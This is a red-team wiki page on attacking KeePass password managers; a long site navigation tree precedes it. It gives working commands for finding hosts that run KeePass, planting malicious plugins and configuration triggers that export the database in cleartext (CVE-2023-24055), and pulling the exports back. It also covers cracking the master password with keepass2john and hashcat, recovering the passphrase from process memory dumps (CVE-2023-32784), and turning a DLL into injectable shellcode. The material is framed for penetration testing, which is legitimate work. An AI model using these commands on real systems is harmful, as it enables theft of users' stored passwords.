Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • 🛠️Maltego
      • 🛠️Specialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • 🛠️DLL Injection
        • 🛠️CreateRemoteThread Injection
        • 🛠️Reflective DLL Injection
        • 🛠️NtMapViewOfSection Injection
        • 🛠️SetWindowHookEx Injection
        • 🛠️PoolParty
        • 🛠️MockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • 🛠️Sliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • 🛠️MS Office - Excel 4.0 (XLM) Macros
          • 🛠️MS Office - VBA Stomping
          • 🛠️MS Office - Remote Dotm Template Injection
        • 🛠️Phishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • 🛠️Udev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • 🛠️Load Unsigned Drivers
        • 🛠️Minifilter Altitude
        • 🛠️Hypervisor Code Integrity (HVCI) Disallowed Images
        • 🛠️Windows Filtering Platform (WFP)
        • 🛠️Userland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • 🛠️Commandline Obfusaction
        • 🛠️PE Obfuscation
        • 🛠️String Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • 🛠️PowerShell Constrained Language Mode (CLM) Bypass
      • 🛠️Kill Windows Defender
      • 🛠️Virtualization-based security (VBS) Bypass
        • 🛠️Credential Guard bypass
        • 🛠️hypervisor-protected code integrity (HVCI) Bypass
        • 🛠️Windows Defender Application Control (WDAC) Bypass
      • 🛠️Sandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • 🛠️Process & Services
    • Privilege Escalation
      • Windows
        • Tools ⚙️
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • 🛠️DLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • 🛠️DirtyCow
          • 🛠️RDS
          • 🛠️Full Nelson
          • 🛠️Mempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • 🛠️Joomla
        • 🛠️Drupal
        • 🛠️Bolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • 🛠️Django
        • 🛠️Flask
        • 🛠️Laravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • 🛠️Java Deserialization
          • 🛠️Ruby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • 🛠️File Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • 🛠️RPC Port Mapper
      • 🛠️FTP
      • 🛠️Telnet
      • 🛠️MySQL
    • WiFi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools ⚙️
        • PowerView ⚙️
        • Responder ⚙️
        • BloodHound ⚙️
        • enum4linux ⚙️
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • 🛠️DC Shadow
      • 🛠️Access controls
  • 🛠️Cloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • 🛠️HTTP API V2
      • 🛠️Kubernetes
      • 🛠️GitLab
      • 🛠️Github
      • 🛠️Gitea
      • 🛠️Jenkins
      • 🛠️Terraform
    • Azure Pentesting
      • Reconnaissance
        • Tools ⚙️
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • 🛠️Smart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Practice
  • Enumeration
  • KeePass Plugin Abuse
  • KeePass Trigger Abuse - CVE-2023-24055
  • Cracking KDBX Database Master Password
  • Extract Passphrase from Memory - CVE-2023-32784
  • KeePass DLL Injection
  • Resources

Was this helpful?

Edit on GitHub
  1. Red-Teaming
  2. Credential Access
  3. Password Stores

KeePass

MITRE ATT&CK™ Credentials from Password Stores: Password Managers - Technique T1555.005

Last updated 5 months ago

Was this helpful?

Theory

Password managers generate and securely store passwords of various services, safeguarding them under a single master password. This master password serves as the key to access all the stored passwords within the password manager.

Examples of Password Manager applications:

  • Third-party: KeePass, 1Password, LastPass

However, misconfiguration and security flaws are found in these applications that let us access stored data. Various tools could be used during the enumeration stage to get sensitive data in password manager applications used by Internet browsers and desktop applications.

Practice

Enumeration

(Python) can be used to remotely identify hosts that run KeePass on a target environment.

# Search by files
python3 KeePwn.py search -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -tf ./targets.txt

# Search by processes + csv output
python3 KeePwn.py search -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -tf ./targets.txt --threads 4 --get-process --found-only --output keepwn_out.csv

(Python) can also be used to remotly check if keepass is installed on the target environment.

nxc smb <TARGETS> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover

KeePass Plugin Abuse

These actions are made through SMB C$ share access, limiting AV/EDR detection as no command execution is performed.

# List currently installed plugins and enumerate the plugin cache
python3 KeePwn.py plugin check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>     

# Add and remove your malicious plugins which performs a cleartext export of the database in %APPDATA% on next KeePass launch
python3 KeePwn.py plugin add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>     

# Poll %APPDATA% for exports and automatically moves it from remote host to local filesystem
python3 KeePwn.py plugin poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>     

Export the database using malicious plugin:

KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"

Export the database by hijacking a legit plugin DLL (requires an existent plugin in use):

copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
devenv /build Release KeeFarceRebornPlugin.sln
copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll

KeePass Trigger Abuse - CVE-2023-24055

We can modify the KeePass.config.xml file to create malicious triggers that automatically exported database entries to accessible locations.

# Recon
nxc smb <TARGET> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover

# Exploit
nxc smb <TARGET> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"

If the configuration file path is not the default location, you can specify one with --config-path argument.

# Check if a malicious trigger named "export" is currently written in KeePass configuration
python3 KeePwn.py trigger check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>     

# Add and remove a malicious trigger named "export" which performs a cleartext export of the database in %APPDATA% on next KeePass launch
python3 KeePwn.py trigger add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>     

# Poll %APPDATA% for exports and automatically moves it from remote host to local filesystem
python3 KeePwn.py trigger poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>     

Cracking KDBX Database Master Password

Cracking Master Password - Manually

If we gained access to the keepass database, we may be able to extract it and crack the master database password.

Keepass database is stored as a .kdbx file, we can search for such files using following commands:

#PowerShell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

#Cmd
dir /s /b C:\*.kdbx
keepass2john keepass.kdbx > keepass.hash
hashcat -a 0 -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt --user
$ kpcli --kdb=db.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
Database/

kpcli:/> cd Database
kpcli:/Database> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Sample Entry                                               keepass.info
1. Sample Entry #2                          keepass.info/help/kb/testform.
2. User Company Password

kpcli:/Database> show -f 0
Title: Sample Entry
Uname: User Name
 Pass: Password
  URL: https://keepass.info/
Notes: NotesCracking Master Password - NetExec

NetExec
 (Python) can be used to remotly check if keepass is installed on the target computer and then steal the master password and decrypt the database !
nxc smb <TARGETS> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover

Extract Passphrase from Memory - CVE-2023-32784

Fisrt, perform a process dump of the running KeePass

Get-Process keepass
.\procdump.exe -accepteula -ma 988 KeePass.DMP

Retrieve the process dump as well as the .KDBX containing the encrypted database (e.g. through SMB).

python3 KeePwn.py parse_dump -d <dump_file> --bruteforce <database_file>

KeePassXC is also subject to such exploits.

Fisrt, perform a process dump of the running KeePassXC

Get-Process keepassxc
.\procdump.exe -accepteula -ma 988 KeePassXC.DMP

Retrieve the process dump as well as the .KDBX containing the encrypted database (e.g. through SMB).

python3 pass_the_key.py <dump_file> <database_file>

KeePass DLL Injection

donut "KeeFarceReborn.dll" -c KeeFarceReborn.Program -m Main -e 1

Post-injection steps

Once the injection is performed, you will see debug messages being printed in MessageBox (which should obviously be removed when used in a real penetration testing scenario) then find the exported database in the current user's %APPDATA% (choosed by default, as KeePass will be sure to have write access). The exported XML file can later be imported in any KeePass database without asking for a password

Resources

KeePass features a which can be abused to load malicious DLLs into KeePass process, allowing attackers with administrator rights to easily export the database (see: ).

(Python) can be used to abuse this KeePass Plugin feature, exporting the database in cleartext.

By compiling the project, and copying the DLL into the plugins directory (located at at KeePass root, namely "C:\Program Files\KeePass Password Safe 2\Plugins" for a global install), we can abuse KeePass Plugin.

This KeePass Trigger Abuse, identified as only affects KeePass versions 2.53 and earlier.

(Python) can be used to remotly check if keepass is installed on the target computer and then steal the master password trough KeePass Trigger and decrypt the database.

(Python) can also be used to remotely abuse KeePass trigger in order to export the database in cleartext.

One we exfiltrate the database to our attacking computer, we can start by using and save the output hase a crackable hash.

Then, we may crack the master password using hashcat. See for more details about cracking passwords.

Now, we can open the database using and dump passwords

As described by , it is possible to retrieve the database's master password in memory

This KeePass Abuse, identified as only affects KeePass versions priot to 2.54.

(Python) can then be used to search for potential master password candidates in dumps. Because the resulting strings will (by design) be incomplete, the module can also be used to bruteforce the missing first character against a specified KDBX file.

can then be used to search for composite key-like strings from a KeePassXC process dump.

is a standalone DLL that exports databases in cleartext once injected in the KeePass process.

After compiling the DLL, we may use to convert it to a shellcode and use it with any injection technique.

Built-in password managers (Windows)
KeePwn
NetExec
plugin framework
KeeFarceRebornPlugin
KeePwn
KeeFarceRebornPlugin
CVE-2023-24055
NetExec
KeePwn
keepass2john
this page
kpcli
@vdohney
CVE-2023-32784
KeePwn
KeePass-the-Hash
KeeFarceReborn
Donut
LogoCredentials from Password Stores: Password Managers, Sub-technique T1555.005 - Enterprise | MITRE ATT&CK®
LogoGitHub - Orange-Cyberdefense/KeePwn: A python tool to automate KeePass discovery and secret extraction.GitHub
LogoKeePass | Pentester's Promiscuous Notebook